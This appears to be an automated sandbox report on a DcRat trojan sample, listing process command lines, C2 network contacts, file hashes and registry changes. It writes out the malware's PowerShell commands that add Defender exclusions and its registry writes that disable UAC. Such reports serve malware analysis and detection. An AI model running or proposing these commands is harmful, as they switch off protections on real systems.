"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZulfStaN0H.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

"C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ffff686-4516-46fa-9f0d-2e8ef0881a28.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\023fb7b8-b690-4d75-b756-fba66941e125.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28d0c9de-bce9-431f-b7c4-b0c31daffd5d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a34004e5-db2d-4197-a3fe-47162cebb188.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ca98162-3d6a-4a27-b81a-fe696b8f376d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8526f789-beb6-40ef-aee9-a6b5bb5143da.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\70ce8163-641e-4dd6-9974-4cad816e5fb0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\148b7e11-ee7d-4d81-9d9a-eabcd024a733.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1966821b-46e2-4bd3-92f2-7358e42a5a80.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cfd4f19f-9276-44f0-8e38-404f7146c46b.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

memory/2380-12-0x00000000004F0000-0x00000000004FA000-memory.dmp

memory/2380-11-0x0000000000510000-0x0000000000520000-memory.dmp

memory/2380-10-0x0000000000460000-0x0000000000468000-memory.dmp

memory/2380-9-0x0000000000440000-0x0000000000456000-memory.dmp

memory/2380-8-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2380-7-0x00000000001E0000-0x00000000001E8000-memory.dmp

memory/2380-6-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2380-5-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/2380-4-0x00000000001C0000-0x00000000001CE000-memory.dmp

memory/2380-3-0x00000000001B0000-0x00000000001BE000-memory.dmp

memory/2380-2-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

memory/2380-1-0x0000000000C20000-0x0000000000F5C000-memory.dmp

memory/2380-0-0x000007FEF5A73000-0x000007FEF5A74000-memory.dmp

memory/2380-13-0x0000000000520000-0x0000000000576000-memory.dmp

memory/2380-14-0x0000000002460000-0x000000000246C000-memory.dmp

memory/2380-15-0x0000000002470000-0x0000000002478000-memory.dmp

memory/2380-16-0x0000000002480000-0x000000000248C000-memory.dmp

memory/2380-17-0x0000000002490000-0x0000000002498000-memory.dmp

memory/2380-18-0x00000000024A0000-0x00000000024B2000-memory.dmp

memory/2380-19-0x00000000024B0000-0x00000000024BC000-memory.dmp

memory/2380-20-0x000000001A9E0000-0x000000001A9EC000-memory.dmp

memory/2380-21-0x000000001A9F0000-0x000000001A9FC000-memory.dmp

memory/2380-22-0x000000001AA00000-0x000000001AA0C000-memory.dmp

memory/2380-23-0x000000001AA10000-0x000000001AA18000-memory.dmp

memory/2380-25-0x000000001AF50000-0x000000001AF5E000-memory.dmp

memory/2380-24-0x000000001AF40000-0x000000001AF4A000-memory.dmp

memory/2380-26-0x000000001AF60000-0x000000001AF68000-memory.dmp

memory/2380-27-0x000000001AFF0000-0x000000001AFFE000-memory.dmp

memory/2380-28-0x000000001B000000-0x000000001B00C000-memory.dmp

memory/2380-29-0x000000001B010000-0x000000001B018000-memory.dmp

memory/2380-30-0x000000001B020000-0x000000001B02A000-memory.dmp

memory/2380-31-0x000000001B030000-0x000000001B03C000-memory.dmp

memory/2380-32-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

C:\Users\Default\Downloads\dwm.exe

MD5 1553f67a0859a3057cde01f77db9dbc0
SHA1 2cfe40d1fea16093e16c96a35f3240b98da9a5e1
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
SHA512 4ff68e4ad4299aa2ca2be8dfd1742d641cf9aee6b687f94b1e3c68062630b2e167a13550a8a184c8ff5a3df1da5b3182ebd29759a84a219af37a8688df6f0de5

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe

MD5 325ab4cde5aecfae8d6ec0b25d8d3b91
SHA1 9761ef61579af9d336742d9713c97e4f25754fc4
SHA256 962b6e4d5391f0fb417f483f3da6158cb235348990910b9febb4838795a0220f
SHA512 25997b198f35f043c635f5cedc2f3c6a680c64d8ca5772d48229f25cc3503ce03ef6070b2c2d8c1a4d203a2fb39e37869d8eee6838ffbedd9c0ef87211bc6cd3

C:\Windows\LiveKernelReports\lsass.exe

MD5 3023d473a232c30ac5508e987117dcfa
SHA1 b1281d49ec300fbb81b116915205e3df11b22b1e
SHA256 00580a7b6017eaa317ea0ecb26fb3249cd8b53e5b6e02041f7b4d0790aaa6c7e
SHA512 0e5147b8c73c986fca106bc9ffeba969392dd88cd6c90e1d8172b730f544ed593731f666d87f5a54693fed9cc120e0f2a597045bbdba04c377f04d8ee5a3b828

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb52e6e949decc6a10e4aa81a379c4a7
SHA1 068a4772951abb25314c24159cff8214b2ab4269
SHA256 fed2bdbdb506bca7f2086a718c56a682b9a4de8f1cc8942890ea254fb4f72727
SHA512 191e474a8cc287f6180a628365b2639a58c8587caac9e173048257a8734d0deba1ac1a45495f6ef72b98bcec1aae99b0ed02ba8e3c38712cdb4c385bc9a9a93c

memory/664-231-0x000000001B230000-0x000000001B512000-memory.dmp

memory/664-239-0x00000000022F0000-0x00000000022F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZulfStaN0H.bat

MD5 45195d6b4979756c0ad21b67b9e1831e
SHA1 82db6ac0e69e5424667955c258e4937baf0749a6
SHA256 94321fadc372ec3ae98a7c1b86c60301f380d14a5083c5d39d7acdffa4418ad1
SHA512 7f63b69ec74b94b97409a138a4dbca5b0ac15b25070e09e7bce3c7b695778146307a0322ea769c4f97b3e0a89fd756e85565b873b973030e69bcca765da4a96a

memory/2380-276-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

memory/2612-279-0x0000000001370000-0x00000000016AC000-memory.dmp

memory/2612-280-0x0000000001260000-0x00000000012B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7ffff686-4516-46fa-9f0d-2e8ef0881a28.vbs

MD5 e83026a7357a2e644a6438dcbc26caef
SHA1 554c63ddbc4fd1e65a8ecc37d1170e45fe009831
SHA256 b69ea6fd70dd4a4979a7a4b1e0323e697498baf9f4d3ee94162af114f6a5dba0
SHA512 681b36ae2ab98ddb5395e13add638f954388e67ee65dffa78ddfc50671995af935269e3b6eb2c470b66dff992ee674a220f6acdb47924d323f34e009fb7c91fe

C:\Users\Admin\AppData\Local\Temp\023fb7b8-b690-4d75-b756-fba66941e125.vbs

MD5 fd89b79f32faf02cd4d131f6f4791064
SHA1 3261963b0ed0d6266b96e3a00607ce733d5b1361
SHA256 cc163745e88b36f2b7c651051b417a559e4f796b7f2fc915b973d1311a7910e0
SHA512 695bbae3fcdce21a58e65043f1797f0113417f3aa096ca4f1ea4b02ac473a93c0c397f816b4b38c3d32893007a9fb044329e47cc68c2bc63948d0959a89f7b08

C:\Users\Admin\AppData\Local\Temp\ca1033d37860b7102ff60b8f8b730d81674a1cfb.exe

MD5 1415988fb81427713469cc9232c1410e
SHA1 b5ef5fe6d4c8fd6e999fc9c3aba4e248c832abb2
SHA256 53c5ad2b80527745e383b5e13dc55612089ee5b8f7d618d0e0ed190605f79482
SHA512 b0492f41e6cf2104958b59eea7a6e58c767e9bb1970b6076bf2bffa17e41071cb897357661da77a185acae0340ac58e71f17c21388eeac42bf8c1e693331c0d9

C:\Users\Admin\AppData\Local\Temp\28d0c9de-bce9-431f-b7c4-b0c31daffd5d.vbs

MD5 f79903abd422c2d05a57205ee5907433
SHA1 835d541b79cd08c240c6b4898b71f2942fad49ca
SHA256 4d85ca388a8d39d12bcf3214a39bdf600e045068d0a4b360771f82933135317b
SHA512 cc1b78918e5352a69ffcd9e65006536090db118a6ba7c82f2652a530cb76083c4c9bf4a7aa0d722e94a7ff4b53ac8bf9885c8cecb2fef7916c1711c32fcae9f0

memory/2740-302-0x0000000000040000-0x000000000037C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8ca98162-3d6a-4a27-b81a-fe696b8f376d.vbs

MD5 6cc7946cc438d7ab70de9c1dff330f88
SHA1 cc022a49a848c30af0680f4780b99eb55c9ff6b8
SHA256 dc445a3723df2b7f574eb8ff8b367c36c98819788d36599f4eef7fdf9d7d6f20
SHA512 5fa3424636b72cbcaaaa8d483669147ac950790caf2d3c3db12ef4be9075e89ba97cd393e6f553cfbd13fdd2b3fcd482ee1aadcffb4ea5dbfe1d167e8f17edaa

memory/2256-314-0x0000000001000000-0x000000000133C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70ce8163-641e-4dd6-9974-4cad816e5fb0.vbs

MD5 87716e5f6941d601eee2e1a6652caedc
SHA1 6aa60dff27d85a70d48e13b2d56e14dfad0de977
SHA256 12a52b4638715aae2fe948cca42454cab337c1a122415d039de252cf4bec9a20
SHA512 2f4c7fb0b3dc91caa425a6661dff694a29115e77142a1debea6ce49c960b98ffb89bc92a77897f248b57f22319652d764cb26c8c81c4c8f4e0bfff4b89be2638

memory/2496-326-0x0000000001220000-0x000000000155C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1966821b-46e2-4bd3-92f2-7358e42a5a80.vbs

MD5 5a1cfab63fa8629e8415bf53e0ed3c2f
SHA1 23b44f80af6f3a376030049e67de00cd59dd3a4e
SHA256 d387f5a447458c34771372eb5ffedede135ed4dece4112ebb5a14a555254bb86
SHA512 fa5e205632fc2cfd239c8b11bd120f20e3f9f8bd2d79a94af61758d11c8630bed749fc0511eb79239026d58ead7eecd224f48439a910584b6b060def7a45e250

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 19:23

Reported

2024-05-14 19:25

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |

DCRat payload

rat
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Checks computer location settings

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |

Checks whether UAC is enabled

evasion trojan
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\All Users\Start Menu\dwm.exe | N/A |

Drops file in Program Files directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Windows Photo Viewer\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\en-US\RCX6F58.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\smss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\66fc9ff0ee96c2 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
